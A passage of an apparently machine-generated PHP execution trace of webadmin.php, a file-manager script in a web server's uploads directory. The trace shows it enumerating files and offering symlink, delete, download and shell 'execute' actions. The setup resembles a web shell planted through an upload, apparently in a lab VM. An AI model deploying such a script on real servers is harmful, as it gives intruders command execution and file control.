['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => 'webadmin.php', 'path' => '/var/www/html/uploads/webadmin.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]
4	378	1	0.018302	802736
4	378	R			6
3		A						/var/www/html/uploads/webadmin.php	1250	$file = ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	379	0	0.018343	802704	date	0		/var/www/html/uploads/webadmin.php	1252	2	'n/j/y H:i:s'	1676243916
4	379	1	0.018375	803032
4	379	R			'2/12/23 18:18:36'
3		A						/var/www/html/uploads/webadmin.php	1252	$timestamps = 'mtime: 2/12/23 18:18:36, '
4	380	0	0.018402	802648	date	0		/var/www/html/uploads/webadmin.php	1253	2	'n/j/y H:i:s'	1676243916
4	380	1	0.018432	802976
4	380	R			'2/12/23 18:18:36'
3		A						/var/www/html/uploads/webadmin.php	1253	$timestamps .= 'atime: 2/12/23 18:18:36, '
4	381	0	0.018458	802672	date	0		/var/www/html/uploads/webadmin.php	1254	2	'n/j/y H:i:s'	1676243916
4	381	1	0.018488	803000
4	381	R			'2/12/23 18:18:36'
3		A						/var/www/html/uploads/webadmin.php	1254	$timestamps .= 'ctime: 2/12/23 18:18:36'
4	382	0	0.018514	802896	html	1		/var/www/html/uploads/webadmin.php	1258	1	'mtime: 2/12/23 18:18:36, atime: 2/12/23 18:18:36, ctime: 2/12/23 18:18:36'
5	383	0	0.018529	802896	htmlentities	0		/var/www/html/uploads/webadmin.php	1594	3	'mtime: 2/12/23 18:18:36, atime: 2/12/23 18:18:36, ctime: 2/12/23 18:18:36'	2	NULL
5	383	1	0.018545	803200
5	383	R			'mtime: 2/12/23 18:18:36, atime: 2/12/23 18:18:36, ctime: 2/12/23 18:18:36'
4	382	1	0.018562	803088
4	382	R			'mtime: 2/12/23 18:18:36, atime: 2/12/23 18:18:36, ctime: 2/12/23 18:18:36'
4	384	0	0.018577	802704	substr	0		/var/www/html/uploads/webadmin.php	1289	3	'prepend.php'	0	1
4	384	1	0.018591	802800
4	384	R			'p'
4	385	0	0.018605	802784	urlencode	0		/var/www/html/uploads/webadmin.php	1296	1	'/var/www/html/uploads/prepend.php'
4	385	1	0.018619	802896
4	385	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2Fprepend.php'
4	386	0	0.018635	802832	html	1		/var/www/html/uploads/webadmin.php	1296	1	'prepend.php'
5	387	0	0.018648	802832	htmlentities	0		/var/www/html/uploads/webadmin.php	1594	3	'prepend.php'	2	NULL
5	387	1	0.018663	803104
5	387	R			'prepend.php'
4	386	1	0.018677	802992
4	386	R			'prepend.php'
3		A						/var/www/html/uploads/webadmin.php	1306	$human = ''
4	388	0	0.018702	802704	decoct	0		/var/www/html/uploads/webadmin.php	1315	1	33261
4	388	1	0.018715	802776
4	388	R			'100755'
4	389	0	0.018728	802704	function_exists	0		/var/www/html/uploads/webadmin.php	1317	1	'posix_getuid'
4	389	1	0.018741	802744
4	389	R			TRUE
4	390	0	0.018754	802704	posix_getuid	0		/var/www/html/uploads/webadmin.php	1317	0
4	390	1	0.018767	802704
4	390	R			33
3		A						/var/www/html/uploads/webadmin.php	1317	$l = FALSE
4	391	0	0.018790	802704	permission_octal2string	1		/var/www/html/uploads/webadmin.php	1319	1	33261
4		A						/var/www/html/uploads/webadmin.php	966	$type = '-'
4		A						/var/www/html/uploads/webadmin.php	979	$owner = 'r'
4		A						/var/www/html/uploads/webadmin.php	980	$owner .= 'w'
4		A						/var/www/html/uploads/webadmin.php	984	$owner .= 'x'
4		A						/var/www/html/uploads/webadmin.php	987	$group = 'r'
4		A						/var/www/html/uploads/webadmin.php	988	$group .= '-'
4		A						/var/www/html/uploads/webadmin.php	992	$group .= 'x'
4		A						/var/www/html/uploads/webadmin.php	995	$other = 'r'
4		A						/var/www/html/uploads/webadmin.php	996	$other .= '-'
4		A						/var/www/html/uploads/webadmin.php	1000	$other .= 'x'
4	391	1	0.018908	802744
4	391	R			'-rwxr-xr-x'
4	392	0	0.018922	802744	html	1		/var/www/html/uploads/webadmin.php	1319	1	'-rwxr-xr-x'
5	393	0	0.018936	802744	htmlentities	0		/var/www/html/uploads/webadmin.php	1594	3	'-rwxr-xr-x'	2	NULL
5	393	1	0.018950	803016
5	393	R			'-rwxr-xr-x'
4	392	1	0.018964	802904
4	392	R			'-rwxr-xr-x'
4	394	0	0.018978	802704	array_key_exists	0		/var/www/html/uploads/webadmin.php	1324	2	'owner_name'	['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	394	1	0.019015	802768
4	394	R			TRUE
4	395	0	0.019029	802704	array_key_exists	0		/var/www/html/uploads/webadmin.php	1330	2	'group_name'	['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	395	1	0.019058	802768
4	395	R			TRUE
4	396	0	0.019072	802800	html	1		/var/www/html/uploads/webadmin.php	1339	1	'/var/www/html/uploads/prepend.php'
5	397	0	0.019086	802800	htmlentities	0		/var/www/html/uploads/webadmin.php	1594	3	'/var/www/html/uploads/prepend.php'	2	NULL
5	397	1	0.019101	803072
5	397	R			'/var/www/html/uploads/prepend.php'
4	396	1	0.019117	802960
4	396	R			'/var/www/html/uploads/prepend.php'
3		A						/var/www/html/uploads/webadmin.php	1342	$actions = []
4	398	0	0.019143	802328	function_exists	0		/var/www/html/uploads/webadmin.php	1343	1	'symlink'
4	398	1	0.019156	802368
4	398	R			TRUE
3		A						/var/www/html/uploads/webadmin.php	1344	$actions[] = 'create_symlink'
4	399	0	0.019180	802704	dirname	0		/var/www/html/uploads/webadmin.php	1346	1	'/var/www/html/uploads/prepend.php'
4	399	1	0.019193	802800
4	399	R			'/var/www/html/uploads'
4	400	0	0.019207	802768	is_writable	0		/var/www/html/uploads/webadmin.php	1346	1	'/var/www/html/uploads'
4	400	1	0.019224	802808
4	400	R			TRUE
3		A						/var/www/html/uploads/webadmin.php	1347	$actions[] = 'delete'
3		A						/var/www/html/uploads/webadmin.php	1348	$actions[] = 'rename'
3		A						/var/www/html/uploads/webadmin.php	1349	$actions[] = 'move'
3		A						/var/www/html/uploads/webadmin.php	1352	$actions[] = 'copy'
3		A						/var/www/html/uploads/webadmin.php	1353	$actions[] = 'download'
4	401	0	0.019288	802704	function_exists	0		/var/www/html/uploads/webadmin.php	1356	1	'exec'
4	401	1	0.019301	802744
4	401	R			TRUE
4	402	0	0.019314	802704	file_exists	0		/var/www/html/uploads/webadmin.php	1356	1	'/bin/sh'
4	402	1	0.019332	802744
4	402	R			TRUE
3		A						/var/www/html/uploads/webadmin.php	1357	$actions[] = 'execute'
4	403	0	0.019355	802704	sizeof	0		/var/www/html/uploads/webadmin.php	1360	1	[0 => 'create_symlink', 1 => 'delete', 2 => 'rename', 3 => 'move', 4 => 'copy', 5 => 'download', 6 => 'execute']
4	403	1	0.019375	802736
4	403	R			7
4	404	0	0.019388	802800	str_repeat	0		/var/www/html/uploads/webadmin.php	1363	2	'&nbsp;'	30
4	404	1	0.019401	803088
4	404	R			'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'
4	405	0	0.019417	802768	word	1		/var/www/html/uploads/webadmin.php	1367	1	'create_symlink'
5	406	0	0.019431	802768	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'create symlink'	2	'UTF-8'
5	406	1	0.019446	803040
5	406	R			'create symlink'
4	405	1	0.019461	802928
4	405	R			'create symlink'
4	407	0	0.019475	802760	word	1		/var/www/html/uploads/webadmin.php	1367	1	'delete'
5	408	0	0.019488	802760	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'delete'	2	'UTF-8'
5	408	1	0.019502	803032
5	408	R			'delete'
4	407	1	0.019516	802920
4	407	R			'delete'
4	409	0	0.019530	802760	word	1		/var/www/html/uploads/webadmin.php	1367	1	'rename'
5	410	0	0.019547	802760	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'rename'	2	'UTF-8'
5	410	1	0.019562	803032
5	410	R			'rename'
4	409	1	0.019576	802920
4	409	R			'rename'
4	411	0	0.019590	802752	word	1		/var/www/html/uploads/webadmin.php	1367	1	'move'
5	412	0	0.019602	802752	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'move'	2	'UTF-8'
5	412	1	0.019616	803024
5	412	R			'move'
4	411	1	0.019629	802912
4	411	R			'move'
4	413	0	0.019642	802752	word	1		/var/www/html/uploads/webadmin.php	1367	1	'copy'
5	414	0	0.019655	802752	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'copy'	2	'UTF-8'
5	414	1	0.019669	803024
5	414	R			'copy'
4	413	1	0.019683	802912
4	413	R			'copy'
4	415	0	0.019696	802760	word	1		/var/www/html/uploads/webadmin.php	1367	1	'download'
5	416	0	0.019709	802760	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'download'	2	'UTF-8'
5	416	1	0.019723	803032
5	416	R			'download'
4	415	1	0.019737	802920
4	415	R			'download'
4	417	0	0.019751	802760	word	1		/var/www/html/uploads/webadmin.php	1367	1	'execute'
5	418	0	0.019764	802760	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'execute'	2	'UTF-8'
5	418	1	0.019778	803032
5	418	R			'execute'
4	417	1	0.019792	802920
4	417	R			'execute'
3		A						/var/www/html/uploads/webadmin.php	1249	$i++
4	419	0	0.019816	802704	sizeof	0		/var/www/html/uploads/webadmin.php	1249	1	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => 'webadmin.php', 'path' => '/var/www/html/uploads/webadmin.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]
4	419	1	0.019890	802736
4	419	R			6
3		A						/var/www/html/uploads/webadmin.php	1250	$file = ['filename' => 'webadmin.php', 'path' => '/var/www/html/uploads/webadmin.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']
4	420	0	0.019982	802704	date	0		/var/www/html/uploads/webadmin.php	1252	2	'n/j/y H:i:s'	1676243916
4	420	1	0.020015	803032
4	420	R			'2/12/23 18:18:36'
3		A						/var/www/html/uploads/webadmin.php	1252	$timestamps = 'mtime: 2/12/23 18:18:36, '
4	421	0	0.020042	802648	date	0		/var/www/html/uploads/webadmin.php	1253	2	'n/j/y H:i:s'	1676243916
4	421	1	0.020073	802976
4	421	R			'2/12/23 18:18:36'
3		A						/var/www/html/uploads/webadmin.php	1253	$timestamps .= 'atime: 2/12/23 18:18:36, '
4	422	0	0.020099	802672	date	0		/var/www/html/uploads/webadmin.php	1254	2	'n/j/y H:i:s'	1676243916
4	422	1	0.020129	803000
4	422	R			'2/12/23 18:18:36'
3		A						/var/www/html/uploads/webadmin.php	1254	$timestamps .= 'ctime: 2/12/23 18:18:36'
4	423	0	0.020155	802896	html	1		/var/www/html/uploads/webadmin.php	1258	1	'mtime: 2/12/23 18:18:36, atime: 2/12/23 18:18:36, ctime: 2/12/23 18:18:36'
5	424	0	0.020170	802896	htmlentities	0		/var/www/html/uploads/webadmin.php	1594	3	'mtime: 2/12/23 18:18:36, atime: 2/12/23 18:18:36, ctime: 2/12/23 18:18:36'	2	NULL
5	424	1	0.020188	803200
5	424	R			'mtime: 2/12/23 18:18:36, atime: 2/12/23 18:18:36, ctime: 2/12/23 18:18:36'
4	423	1	0.020204	803088
4	423	R			'mtime: 2/12/23 18:18:36, atime: 2/12/23 18:18:36, ctime: 2/12/23 18:18:36'
4	425	0	0.020220	802704	substr	0		/var/www/html/uploads/webadmin.php	1289	3	'webadmin.php'	0	1
4	425	1	0.020235	802800
4	425	R			'w'
4	426	0	0.020249	802784	urlencode	0		/var/www/html/uploads/webadmin.php	1296	1	'/var/www/html/uploads/webadmin.php'
4	426	1	0.020262	802896
4	426	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2Fwebadmin.php'
4	427	0	0.020279	802832	html	1		/var/www/html/uploads/webadmin.php	1296	1	'webadmin.php'
5	428	0	0.020292	802832	htmlentities	0		/var/www/html/uploads/webadmin.php	1594	3	'webadmin.php'	2	NULL
5	428	1	0.020306	803104
5	428	R			'webadmin.php'
4	427	1	0.020321	802992
4	427	R			'webadmin.php'
4	429	0	0.020335	802704	human_filesize	1		/var/www/html/uploads/webadmin.php	1304	1	77659
4		A						/var/www/html/uploads/webadmin.php	1153	$suffices = 'kMGTPE'
4		A						/var/www/html/uploads/webadmin.php	1155	$n = 0
4		A						/var/www/html/uploads/webadmin.php	1157	$filesize /= 1024
4		A						/var/www/html/uploads/webadmin.php	1158	$n++
5	430	0	0.020396	802704	strpos	0		/var/www/html/uploads/webadmin.php	1161	2	75.8388671875	'.'
5	430	1	0.020413	803032
5	430	R			2
5	431	0	0.020426	802704	round	0		/var/www/html/uploads/webadmin.php	1161	2	75.8388671875	1
5	431	1	0.020440	802776
5	431	R			75.8
4		A						/var/www/html/uploads/webadmin.php	1161	$filesize = 75.8
5	432	0	0.020464	802704	strpos	0		/var/www/html/uploads/webadmin.php	1163	2	75.8	'.'
5	432	1	0.020478	803032
5	432	R			2
5	433	0	0.020491	802704	substr	0		/var/www/html/uploads/webadmin.php	1164	3	75.8	-1	1
5	433	1	0.020505	803056
5	433	R			'8'
5	434	0	0.020518	802704	in_array	0		/var/www/html/uploads/webadmin.php	1164	2	'8'	[0 => '0', 1 => '.']
5	434	1	0.020533	802776
5	434	R			FALSE
5	435	0	0.020547	802704	substr	0		/var/www/html/uploads/webadmin.php	1169	3	'kMGTPE'	0	1
5	435	1	0.020560	802800
5	435	R			'k'
4		A						/var/www/html/uploads/webadmin.php	1169	$suffix = 'k'
4	429	1	0.020586	802736
4	429	R			'75.8 kB'
3		A						/var/www/html/uploads/webadmin.php	1304	$human = ' title="75.8 kB"'
4	436	0	0.020613	802752	decoct	0		/var/www/html/uploads/webadmin.php	1315	1	33204
4	436	1	0.020625	802824
4	436	R			'100664'
4	437	0	0.020638	802752	function_exists	0		/var/www/html/uploads/webadmin.php	1317	1	'posix_getuid'
4	437	1	0.020653	802792
4	437	R			TRUE
4	438	0	0.020665	802752	posix_getuid	0		/var/www/html/uploads/webadmin.php	1317	0
4	438	1	0.020678	802752
4	438	R			33
3		A						/var/www/html/uploads/webadmin.php	1317	$l = FALSE
4	439	0	0.020702	802752	permission_octal2string	1		/var/www/html/uploads/webadmin.php	1319	1	33204
4		A						/var/www/html/uploads/webadmin.php	966	$type = '-'
4		A						/var/www/html/uploads/webadmin.php	979	$owner = 'r'
4		A						/var/www/html/uploads/webadmin.php	980	$owner .= 'w'
4		A						/var/www/html/uploads/webadmin.php	984	$owner .= '-'
4		A						/var/www/html/uploads/webadmin.php	987	$group = 'r'
4		A						/var/www/html/uploads/webadmin.php	988	$group .= 'w'
4		A						/var/www/html/uploads/webadmin.php	992	$group .= '-'
4		A						/var/www/html/uploads/webadmin.php	995	$other = 'r'
4		A						/var/www/html/uploads/webadmin.php	996	$other .= '-'
4		A						/var/www/html/uploads/webadmin.php	1000	$other .= '-'
4	439	1	0.020816	802792
4	439	R			'-rw-rw-r--'
4	440	0	0.020830	802792	html	1		/var/www/html/uploads/webadmin.php	1319	1	'-rw-rw-r--'
5	441	0	0.020844	802792	htmlentities	0		/var/www/html/uploads/webadmin.php	1594	3	'-rw-rw-r--'	2	NULL
5	441	1	0.020859	803064
5	441	R			'-rw-rw-r--'
4	440	1	0.020873	802952
4	440	R			'-rw-rw-r--'
4	442	0	0.020887	802752	array_key_exists	0		/var/www/html/uploads/webadmin.php	1324	2	'owner_name'	['filename' => 'webadmin.php', 'path' => '/var/www/html/uploads/webadmin.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']
4	442	1	0.020917	802816
4	442	R			TRUE
4	443	0	0.020930	802752	array_key_exists	0		/var/www/html/uploads/webadmin.php	1330	2	'group_name'	['filename' => 'webadmin.php', 'path' => '/var/www/html/uploads/webadmin.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']
4	443	1	0.020959	802816
4	443	R			TRUE
4	444	0	0.020973	802848	html	1		/var/www/html/uploads/webadmin.php	1339	1	'/var/www/html/uploads/webadmin.php'
5	445	0	0.020986	802848	htmlentities	0		/var/www/html/uploads/webadmin.php	1594	3	'/var/www/html/uploads/webadmin.php'	2	NULL
5	445	1	0.021001	803120
5	445	R			'/var/www/html/uploads/webadmin.php'
4	444	1	0.021017	803008
4	444	R			'/var/www/html/uploads/webadmin.php'
3		A						/var/www/html/uploads/webadmin.php	1342	$actions = []
4	446	0	0.021043	802376	function_exists	0		/var/www/html/uploads/webadmin.php	1343	1	'symlink'
4	446	1	0.021057	802416
4	446	R			TRUE
3		A						/var/www/html/uploads/webadmin.php	1344	$actions[] = 'create_symlink'
4	447	0	0.021082	802752	dirname	0		/var/www/html/uploads/webadmin.php	1346	1	'/var/www/html/uploads/webadmin.php'
4	447	1	0.021100	802848
4	447	R			'/var/www/html/uploads'
4	448	0	0.021114	802816	is_writable	0		/var/www/html/uploads/webadmin.php	1346	1	'/var/www/html/uploads'
4	448	1	0.021135	802856
4	448	R			TRUE
3		A						/var/www/html/uploads/webadmin.php	1347	$actions[] = 'delete'
3		A						/var/www/html/uploads/webadmin.php	1348	$actions[] = 'rename'
3		A						/var/www/html/uploads/webadmin.php	1349	$actions[] = 'move'
3		A						/var/www/html/uploads/webadmin.php	1352	$actions[] = 'copy'
3		A						/var/www/html/uploads/webadmin.php	1353	$actions[] = 'download'
4	449	0	0.021200	802752	function_exists	0		/var/www/html/uploads/webadmin.php	1356	1	'exec'
4	449	1	0.021213	802792
4	449	R			TRUE
4	450	0	0.021226	802752	sizeof	0		/var/www/html/uploads/webadmin.php	1360	1	[0 => 'create_symlink', 1 => 'delete', 2 => 'rename', 3 => 'move', 4 => 'copy', 5 => 'download']
4	450	1	0.021244	802784
4	450	R			6
4	451	0	0.021257	802848	str_repeat	0		/var/www/html/uploads/webadmin.php	1363	2	'&nbsp;'	30
4	451	1	0.021271	803136
4	451	R			'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'
4	452	0	0.021288	802816	word	1		/var/www/html/uploads/webadmin.php	1367	1	'create_symlink'
5	453	0	0.021308	802816	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'create symlink'	2	'UTF-8'
5	453	1	0.021325	803088
5	453	R			'create symlink'
4	452	1	0.021340	802976
4	452	R			'create symlink'
4	454	0	0.021355	802808	word	1		/var/www/html/uploads/webadmin.php	1367	1	'delete'
5	455	0	0.021368	802808	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'delete'	2	'UTF-8'
5	455	1	0.021383	803080
5	455	R			'delete'
4	454	1	0.021396	802968
4	454	R			'delete'
4	456	0	0.021410	802808	word	1		/var/www/html/uploads/webadmin.php	1367	1	'rename'
5	457	0	0.021423	802808	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'rename'	2	'UTF-8'
5	457	1	0.021437	803080
5	457	R			'rename'
4	456	1	0.021450	802968
4	456	R			'rename'
4	458	0	0.021464	802800	word	1		/var/www/html/uploads/webadmin.php	1367	1	'move'
5	459	0	0.021476	802800	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'move'	2	'UTF-8'
5	459	1	0.021490	803072
5	459	R			'move'
4	458	1	0.021503	802960
4	458	R			'move'
4	460	0	0.021517	802800	word	1		/var/www/html/uploads/webadmin.php	1367	1	'copy'
5	461	0	0.021529	802800	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'copy'	2	'UTF-8'
5	461	1	0.021544	803072
5	461	R			'copy'
4	460	1	0.021557	802960
4	460	R			'copy'
4	462	0	0.021570	802808	word	1		/var/www/html/uploads/webadmin.php	1367	1	'download'
5	463	0	0.021583	802808	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'download'	2	'UTF-8'
5	463	1	0.021597	803080
5	463	R			'download'
4	462	1	0.021611	802968
4	462	R			'download'
3		A						/var/www/html/uploads/webadmin.php	1249	$i++
4	464	0	0.021636	802752	sizeof	0		/var/www/html/uploads/webadmin.php	1249	1	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => 'webadmin.php', 'path' => '/var/www/html/uploads/webadmin.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]
4	464	1	0.021711	802784
4	464	R			6
4	465	0	0.021725	802976	sizeof	0		/var/www/html/uploads/webadmin.php	1385	1	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 